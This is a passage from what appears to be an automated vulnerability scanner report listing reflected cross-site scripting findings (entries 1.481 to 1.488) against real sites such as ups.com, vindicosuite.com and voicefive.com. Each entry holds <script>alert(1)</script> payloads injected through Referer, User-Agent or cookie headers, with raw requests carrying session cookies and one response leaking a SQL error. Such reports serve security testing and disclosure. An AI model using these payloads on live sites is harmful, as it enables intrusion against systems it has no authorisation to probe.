Host: www.wikia.com
Proxy-Connection: keep-alive
Referer: http://www.wikia.com/Wikia
X-Requested-With: XMLHttpRequest
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Geo={"city":"Dallas","country":"US","continent":"NA"}; varnish-stat=/server/ASH/varnish-v11-ASH/HIT/; loadtime=S1297646556.728570461,VS0,VE0; __utmz=251085184.1297646598.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); LUC1=1; qcseg=%7B%22segments%22%3A%5B%7B%22id%22%3A%222495%22%7D%2C%7B%22id%22%3A%222464%22%7D%2C%7B%22id%22%3A%222462%22%7D%2C%7B%22id%22%3A%222459%22%7D%2C%7B%22id%22%3A%222457%22%7D%2C%7B%22id%22%3A%222456%22%7D%2C%7B%22id%22%3A%222453%22%7D%5D%7D; qcsegupdate=1297646595773; __qca=P0-876301846-1297646601771; OAGEO=CO%7C33%7CBogot%C3%A1%7C%7C4.6%7C-74.0833%7C%7C%7C%7C%7C; __utma=251085184.1785666727.1297646598.1297646598.1297646598.1; __utmc=251085184; __utmb=251085184.6.10.1297646598; OAID=ef5275f8036c435efa51b6a3c2ce74fc

Response

HTTP/1.1 500 Internal Server Error
Server: Varnish
Retry-After: 0
X-Selected-Backend: iowa_apache
X-Restarts: 4
Content-Length: 543
Date: Mon, 14 Feb 2011 01:28:08 GMT
Connection: close
X-Served-By: varnish-v12-ASH
X-Cache: MISS
X-Cache-Hits: 0
X-Timer: S1297646887.207281351,VS0,VE1645
Set-Cookie: Geo = {"city":"Dallas","country":"US","continent":"NA"}; path=/
X-Age: 2
X-Varnish-Config: $Revision: 19021 $


<html>
<head>
<title> www.wikia.com/index.php?action=ajax&rs=moduleProxy&moduleName=LatestActivity&actionName=Indexb2c83</title><script>alert(1)</script>95be19a1de3&outputType=html</title>
<script sr
...[SNIP]...

1.481. http://api.bizographics.com/v1/profile.json [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://api.bizographics.com
Path:   /v1/profile.json

Issue detail

The value of the Referer HTTP header is copied into the HTML document as plain text between tags. The payload 89c97<script>alert(1)</script>2c2215b2154 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /v1/profile.json?&callback=dj.module.ad.bio.loadBizoData&api_key=r9t72482usanbp6sphprhvun HTTP/1.1
Host: api.bizographics.com
Proxy-Connection: keep-alive
Referer: 89c97<script>alert(1)</script>2c2215b2154
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BizoID=675ee53a-bc80-4e01-aa24-ca467accf61f; BizoData=vipSsUXrfhMAyjSpNgk6T39Qb1MaQBj6WQYgisqeiidjQcqwKPXXDYVmkoawipO0Dfq1j0w30sQL9madkf8kozH7KXTjLwm8dPXkaj5XcunNcMDa7Re6IGD4lLFy3bMisHmNbAd6xyMUDLG5gCh8GmE4wmnnS9ty8xAR0zwQvdHhisgnnwCNICmFKGa4RXxZnzMYL5lop56fA3rHonFMZ1E3OcisUUeXmc77bBFklv3wQQEmtRCZ1UAhIHgQp0s9VPhT38SEVUJBxdqAyDQmBis3kUIRCUjpBQhSgJ05dWzEQqSCDqAipNN9QFd9eD8AHJR2FGdEz1hYSFbR3chAU2xWtyvDfXYqVKvKL6ku8zbNip0rRSsokcAYJy1mH2jGbDneEWVJTB2iiSz7mTslQLR60k3zySHYwieie

Response

HTTP/1.1 403 Forbidden
Cache-Control: no-cache
Content-Type: text/plain
Date: Mon, 14 Feb 2011 01:36:56 GMT
P3P: CP="NON DSP COR CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
Pragma: no-cache
Server: nginx/0.7.61
Content-Length: 58
Connection: keep-alive

Unknown Referer: 89c97<script>alert(1)</script>2c2215b2154

1.482. http://trk.vindicosuite.com/Tracking/V2/BannerCreative/Impression/ [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://trk.vindicosuite.com
Path:   /Tracking/V2/BannerCreative/Impression/

Issue detail

The value of the Referer HTTP header is copied into the HTML document as plain text between tags. The payload ff2ac<script>alert(1)</script>5126bbc8608 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /Tracking/V2/BannerCreative/Impression/?siteId=55&syndicationOutletId=49160&campaignId=6468&adRotationId=67d7d HTTP/1.1
Host: trk.vindicosuite.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=ff2ac<script>alert(1)</script>5126bbc8608
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VINDICOSUITEAUDIENCE=%7B%22PL%22%3A%7B%223BBC8FBC%2DC6A8%2D43A6%2DB65C%2D2405955B79FE%22%3A%7B%2253398251%2DC5D1%2D4466%2D84FA%2D7CEE6AF3F691%22%3A%221295658149%22%7D%7D%7D; VINDICOAUDIENCEISSUEDIDENTITY=10aa51b8-16d7-4be9-8b5a-488ee3c949fc; vpp=10aa51b8-16d7-4be9-8b5a-488ee3c949fc; 10aa51b8-16d7-4be9-8b5a-488ee3c949fc={1296137382377:InstreamImpression_0:6146|14|2080|45439|14942|33453|10|2204:2}{1296137388154:InstreamImpression_25:6146|14|2080|45439|14942|33453|10|2204:2}{1296137389177:InstreamImpression_50:6146|14|2080|45439|14942|33453|10|2204:2}{1296137394130:InstreamImpression_75:6146|14|2080|45439|14942|33453|10|2204:2}{1296137398881:InstreamImpression_100:6146|14|2080|45439|14942|33453|10|2204:1}{1296749649702:InstreamImpression_0:5745|413|1574|42244|14160|30521|868|2293:1}; __qca=P0-1000809586-1297647560942; ASPSESSIONIDQCDARSQC=GEEIPCKDKELIPBPFGCNCHLPP

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Date: Mon, 14 Feb 2011 01:43:18 GMT
Expires: Mon, 14 Feb 2011 01:43:19 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: ASPSESSIONIDSACDASCC=FEAHMNJDPOLIBGCEKLIDEODC; path=/
X-Powered-By: ASP.NET
Content-Length: 896
Connection: keep-alive

<br>Error Description:Incorrect syntax near 'd7d'.<br>SQL:[Track_BannerCreativeImpression_V.1] @siteId = 55, @bannerCreativeAdModuleId = undefined, @campaignId = 6468, @syndicationOutletId = 49160, @adrotationId = 67d7d, @ipAddress = '173.193.214.243', @sessionId = '970794241', @pixel = '0', @ipNumber = '2915161843', @referer = 'http://www.google.com/search?hl=en&q=ff2ac<script>alert(1)</script>5126bbc8608', @browserName = 'Default', @browserVersion = '0.0', @domain = 'www.google.com', @operatingSystem = 'Windows', @operatingSystemVersion = 'Windows', @userAgent = 'Mozilla/5.0 (Windows; U; Windows NT 6.
...[SNIP]...

1.483. http://trk.vindicosuite.com/Tracking/V2/BannerCreative/Impression/ [User-Agent HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://trk.vindicosuite.com
Path:   /Tracking/V2/BannerCreative/Impression/

Issue detail

The value of the User-Agent HTTP header is copied into the HTML document as plain text between tags. The payload 8ef2c<script>alert(1)</script>769ca383b77 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /Tracking/V2/BannerCreative/Impression/?siteId=55&syndicationOutletId=49160&campaignId=6468&adRotationId=67d7d HTTP/1.1
Host: trk.vindicosuite.com
Proxy-Connection: keep-alive
Referer: http://cache.vindicosuite.com/Feeds/Generator/2.0/GetAdDirector_BannerCreative.asp?bannerCreativeAdModuleId=21772&siteId=55&syndicationOutletId=49160&campaignId=6468&adRotationId=67d7d%22%3E%3Cscript%3Ealert(1)%3C/script%3E1b977e7ff4d&campaignAccountId=1&campaignBrandId=1054&campaignClientId=69
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.138ef2c<script>alert(1)</script>769ca383b77
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VINDICOSUITEAUDIENCE=%7B%22PL%22%3A%7B%223BBC8FBC%2DC6A8%2D43A6%2DB65C%2D2405955B79FE%22%3A%7B%2253398251%2DC5D1%2D4466%2D84FA%2D7CEE6AF3F691%22%3A%221295658149%22%7D%7D%7D; VINDICOAUDIENCEISSUEDIDENTITY=10aa51b8-16d7-4be9-8b5a-488ee3c949fc; vpp=10aa51b8-16d7-4be9-8b5a-488ee3c949fc; 10aa51b8-16d7-4be9-8b5a-488ee3c949fc={1296137382377:InstreamImpression_0:6146|14|2080|45439|14942|33453|10|2204:2}{1296137388154:InstreamImpression_25:6146|14|2080|45439|14942|33453|10|2204:2}{1296137389177:InstreamImpression_50:6146|14|2080|45439|14942|33453|10|2204:2}{1296137394130:InstreamImpression_75:6146|14|2080|45439|14942|33453|10|2204:2}{1296137398881:InstreamImpression_100:6146|14|2080|45439|14942|33453|10|2204:1}{1296749649702:InstreamImpression_0:5745|413|1574|42244|14160|30521|868|2293:1}; __qca=P0-1000809586-1297647560942; ASPSESSIONIDQCDARSQC=GEEIPCKDKELIPBPFGCNCHLPP

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Date: Mon, 14 Feb 2011 01:43:18 GMT
Expires: Mon, 14 Feb 2011 01:43:19 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: ASPSESSIONIDCCRTSCDC=GNPLPDEACGENFEOMMGDHMFFN; path=/
X-Powered-By: ASP.NET
Content-Length: 1595
Connection: keep-alive

<br>Error Description:Incorrect syntax near 'd7d'.<br>SQL:[Track_BannerCreativeImpression_V.1] @siteId = 55, @bannerCreativeAdModuleId = undefined, @campaignId = 6468, @syndicationOutletId = 49160, @a
...[SNIP]...
, @operatingSystem = 'Windows', @operatingSystemVersion = 'Windows', @userAgent = 'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.138ef2c<script>alert(1)</script>769ca383b77', @segment = 'undefined'<br>
...[SNIP]...

1.484. http://www.ups.com/homepage/ddhandler/handler.jsp [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.ups.com
Path:   /homepage/ddhandler/handler.jsp

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload db149"><script>alert(1)</script>19907ea315a was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /homepage/ddhandler/handler.jsp HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;
Referer: http://www.google.com/search?hl=en&q=db149"><script>alert(1)</script>19907ea315a

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:46 GMT
Server: Apache
Content-Length: 228
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=ISO-8859-1


<html>
<head>
<META HTTP-EQUIV="Refresh" CONTENT="0; URL=http://www.google.com/search?hl=en&q=db149"><script>alert(1)</script>19907ea315a">
</head>
<title>UPS.com</title>
<body>
Forwarding to sele
...[SNIP]...

1.485. https://www.ups.com/homepage/ddhandler/handler.jsp [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.ups.com
Path:   /homepage/ddhandler/handler.jsp

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9602c"><script>alert(1)</script>52a22fcaf15 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /homepage/ddhandler/handler.jsp HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;
Referer: http://www.google.com/search?hl=en&q=9602c"><script>alert(1)</script>52a22fcaf15

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:26:20 GMT
Server: Apache
Content-Length: 228
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=ISO-8859-1


<html>
<head>
<META HTTP-EQUIV="Refresh" CONTENT="0; URL=http://www.google.com/search?hl=en&q=9602c"><script>alert(1)</script>52a22fcaf15">
</head>
<title>UPS.com</title>
<body>
Forwarding to sele
...[SNIP]...

1.486. http://ar.voicefive.com/bmx3/broker.pli [UID cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/broker.pli

Issue detail

The value of the UID cookie is copied into the HTML document as plain text between tags. The payload af4ab<script>alert(1)</script>13f76ccbb09 was submitted in the UID cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/broker.pli?pid=p85001580&PRAd=58087461&AR_C=40400763 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.8;sz=160x600;click0=http://a.tribalfusion.com/h.click/atmNvBUVn55rymoWArXTew3dYHPVjC2mMLpHEyVHbaXrfcYF7l0a6pPrJFTbv4THYWmbZbuQFZbmXTQt5TUk4Ev3oTBIYUJ8WHbXmAQCmV7tmWrJ3TUl5teo5mBZbnFbZaXsbQXs3Y1c7npEbP3br5Wr7DVAMTRHvguWoXW8/http://b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SDYN_2011Q1/160/L41/446634589/x90/USNetwork/RS_SDYN_2011Q1_TF_PR_DEF_160/RadioShack_SDYN_2011Q1.html/72634857383030695a694d41416f6366?http://b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/160/L44/1473307965/x90/USNetwork/RS_SELL_2011Q1_TF_CT_160/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=1473307965?
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p67161473=exp=1&initExp=Sat Jan 8 03:20:09 2011&recExp=Sat Jan 8 03:20:09 2011&prad=55352400&cpn=4&arc=38899481&; ar_p83612734=exp=1&initExp=Fri Jan 28 22:52:05 2011&recExp=Fri Jan 28 22:52:05 2011&prad=57555319&arc=39967551&; ar_p45555483=exp=1&initExp=Sat Jan 29 01:32:02 2011&recExp=Sat Jan 29 01:32:02 2011&prad=59007464&arc=38601779&; ar_da39f516a098b3de&#41; ar_p68511049=exp=8&initExp=Mon Jan 31 16:31:23 2011&recExp=Tue Feb 8 18:06:45 2011&prad=264255448&arc=185637092&; ar_p85001580=exp=52&initExp=Wed Jan 26 20:14:29 2011&recExp=Wed Feb 9 14:06:00 2011&prad=58087509&arc=40400793&; ar_p84068139=exp=4&initExp=Sat Feb 12 20:00:22 2011&recExp=Sat Feb 12 20:06:47 2011&prad=%25V%2DOTLT%2DID%25&arc=%25V%2DBCAM%2DID%25&; ar_p86183782=exp=2&initExp=Sat Feb 12 23:06:06 2011&recExp=Sat Feb 12 23:06:58 2011&prad=59264590&arc=40675901&; ar_p84532700=exp=12&initExp=Sat Feb 12 19:58:06 2011&recExp=Sun Feb 13 01:05:05 2011&prad=47146&arc=34917&; ar_s_p84053757=1->1297606675; ar_p84053757=exp=6&initExp=Sun Feb 13 14:17:53 2011&recExp=Sun Feb 13 14:38:09 2011&prad=1160020&arc=1422863&; UID=1d29d89e-72.246.30.75-1294456810af4ab<script>alert(1)</script>13f76ccbb09

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 14 Feb 2011 02:28:40 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p85001580=exp=53&initExp=Wed Jan 26 20:14:29 2011&recExp=Mon Feb 14 02:28:40 2011&prad=58087461&arc=40400763&; expires=Sun 15-May-2011 02:28:40 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_G=method->-1,ts->1297650520; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 27977

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"58087461",Pid:"p85001580",Arc:"40400763",Location:CO
...[SNIP]...
917&', "ar_p84053757": 'exp=6&initExp=Sun Feb 13 14:17:53 2011&recExp=Sun Feb 13 14:38:09 2011&prad=1160020&arc=1422863&', "ar_s_p84053757": '1->1297606675', "UID": '1d29d89e-72.246.30.75-1294456810af4ab<script>alert(1)</script>13f76ccbb09', "ar_p85001580": 'exp=52&initExp=Wed Jan 26 20:14:29 2011&recExp=Wed Feb 9 14:06:00 2011&prad=58087509&arc=40400793&', "ar_p86183782": 'exp=2&initExp=Sat Feb 12 23:06:06 2011&recExp=Sat Feb 12 23:
...[SNIP]...

1.487. http://ar.voicefive.com/bmx3/broker.pli [ar_da39f516a098b3de) ar_p68511049 cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/broker.pli

Issue detail

The value of the ar_da39f516a098b3de&#41; ar_p68511049 cookie is copied into the HTML document as plain text between tags. The payload 8ac4a<script>alert(1)</script>5e82bcbd69f was submitted in the ar_da39f516a098b3de&#41; ar_p68511049 cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/broker.pli?pid=p85001580&PRAd=58087461&AR_C=40400763 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.8;sz=160x600;click0=http://a.tribalfusion.com/h.click/atmNvBUVn55rymoWArXTew3dYHPVjC2mMLpHEyVHbaXrfcYF7l0a6pPrJFTbv4THYWmbZbuQFZbmXTQt5TUk4Ev3oTBIYUJ8WHbXmAQCmV7tmWrJ3TUl5teo5mBZbnFbZaXsbQXs3Y1c7npEbP3br5Wr7DVAMTRHvguWoXW8/http://b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SDYN_2011Q1/160/L41/446634589/x90/USNetwork/RS_SDYN_2011Q1_TF_PR_DEF_160/RadioShack_SDYN_2011Q1.html/72634857383030695a694d41416f6366?http://b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/160/L44/1473307965/x90/USNetwork/RS_SELL_2011Q1_TF_CT_160/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=1473307965?
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p67161473=exp=1&initExp=Sat Jan 8 03:20:09 2011&recExp=Sat Jan 8 03:20:09 2011&prad=55352400&cpn=4&arc=38899481&; ar_p83612734=exp=1&initExp=Fri Jan 28 22:52:05 2011&recExp=Fri Jan 28 22:52:05 2011&prad=57555319&arc=39967551&; ar_p45555483=exp=1&initExp=Sat Jan 29 01:32:02 2011&recExp=Sat Jan 29 01:32:02 2011&prad=59007464&arc=38601779&; ar_da39f516a098b3de&#41; ar_p68511049=exp=8&initExp=Mon Jan 31 16:31:23 2011&recExp=Tue Feb 8 18:06:45 2011&prad=264255448&arc=185637092&8ac4a<script>alert(1)</script>5e82bcbd69f; ar_p85001580=exp=52&initExp=Wed Jan 26 20:14:29 2011&recExp=Wed Feb 9 14:06:00 2011&prad=58087509&arc=40400793&; ar_p84068139=exp=4&initExp=Sat Feb 12 20:00:22 2011&recExp=Sat Feb 12 20:06:47 2011&prad=%25V%2DOTLT%2DID%25&arc=%25V%2DBCAM%2DID%25&; ar_p86183782=exp=2&initExp=Sat Feb 12 23:06:06 2011&recExp=Sat Feb 12 23:06:58 2011&prad=59264590&arc=40675901&; ar_p84532700=exp=12&initExp=Sat Feb 12 19:58:06 2011&recExp=Sun Feb 13 01:05:05 2011&prad=47146&arc=34917&; ar_s_p84053757=1->1297606675; ar_p84053757=exp=6&initExp=Sun Feb 13 14:17:53 2011&recExp=Sun Feb 13 14:38:09 2011&prad=1160020&arc=1422863&; UID=1d29d89e-72.246.30.75-1294456810

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 14 Feb 2011 02:28:39 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p85001580=exp=53&initExp=Wed Jan 26 20:14:29 2011&recExp=Mon Feb 14 02:28:39 2011&prad=58087461&arc=40400763&; expires=Sun 15-May-2011 02:28:39 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_G=method->-1,ts->1297650519; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 27977

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"58087461",Pid:"p85001580",Arc:"40400763",Location:CO
...[SNIP]...
ecExp=Sat Feb 12 20:06:47 2011&prad=%25V%2DOTLT%2DID%25&arc=%25V%2DBCAM%2DID%25&', "ar_p68511049": 'exp=8&initExp=Mon Jan 31 16:31:23 2011&recExp=Tue Feb 8 18:06:45 2011&prad=264255448&arc=185637092&8ac4a<script>alert(1)</script>5e82bcbd69f' };
COMSCORE.BMX.Broker.GlobalConfig={
"urlExcludeList": "http://photobucket.com/$|zone.msn.com|xbox.com|www.aol.com/$|http://Webmail.aol.com/$|http://travel.aol.com/$|http://netscape.aol.com/$|http
...[SNIP]...

1.488. http://ar.voicefive.com/bmx3/broker.pli [ar_p45555483 cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/broker.pli

Issue detail

The value of the ar_p45555483 cookie is copied into the HTML document as plain text between tags. The payload ecf8e<script>alert(1)</script>a7ed8ad7ab7 was submitted in the ar_p45555483 cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/broker.pli?pid=p85001580&PRAd=58087461&AR_C=40400763 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.8;sz=160x600;click0=http://a.tribalfusion.com/h.click/atmNvBUVn55rymoWArXTew3dYHPVjC2mMLpHEyVHbaXrfcYF7l0a6pPrJFTbv4THYWmbZbuQFZbmXTQt5TUk4Ev3oTBIYUJ8WHbXmAQCmV7tmWrJ3TUl5teo5mBZbnFbZaXsbQXs3Y1c7npEbP3br5Wr7DVAMTRHvguWoXW8/http://b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SDYN_2011Q1/160/L41/446634589/x90/USNetwork/RS_SDYN_2011Q1_TF_PR_DEF_160/RadioShack_SDYN_2011Q1.html/72634857383030695a694d41416f6366?http://b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/160/L44/1473307965/x90/USNetwork/RS_SELL_2011Q1_TF_CT_160/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=1473307965?
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p67161473=exp=1&initExp=Sat Jan 8 03:20:09 2011&recExp=Sat Jan 8 03:20:09 2011&prad=55352400&cpn=4&arc=38899481&; ar_p83612734=exp=1&initExp=Fri Jan 28 22:52:05 2011&recExp=Fri Jan 28 22:52:05 2011&prad=57555319&arc=39967551&; ar_p45555483=exp=1&initExp=Sat Jan 29 01:32:02 2011&recExp=Sat Jan 29 01:32:02 2011&prad=59007464&arc=38601779&ecf8e<script>alert(1)</script>a7ed8ad7ab7; ar_da39f516a098b3de&#41; ar_p68511049=exp=8&initExp=Mon Jan 31 16:31:23 2011&recExp=Tue Feb 8 18:06:45 2011&prad=264255448&arc=185637092&; ar_p85001580=exp=52&initExp=Wed Jan 26 20:14:29 2011&recExp=Wed Feb 9 14:06:00 2011&prad=58087509&arc=40400793&; ar_p84068139=exp=4&initExp=Sat Feb 12 20:00:22 2011&recExp=Sat Feb 12 20:06:47 2011&prad=%25V%2DOTLT%2DID%25&arc=%25V%2DBCAM%2DID%25&; ar_p86183782=exp=2&initExp=Sat Feb 12 23:06:06 2011&recExp=Sat Feb 12 23:06:58 2011&prad=59264590&arc=40675901&; ar_p84532700=exp=12&initExp=Sat Feb 12 19:58:06 2011&recExp=Sun Feb 13 01:05:05 2011&prad=47146&arc=34917&; ar_s_p84053757=1->1297606675; ar_p84053757=exp=6&initExp=Sun Feb 13 14:17:53 2011&recExp=Sun Feb 13 14:38:09 2011&prad=1160020&arc=1422863&; UID=1d29d89e-72.246.30.75-1294456810

Response

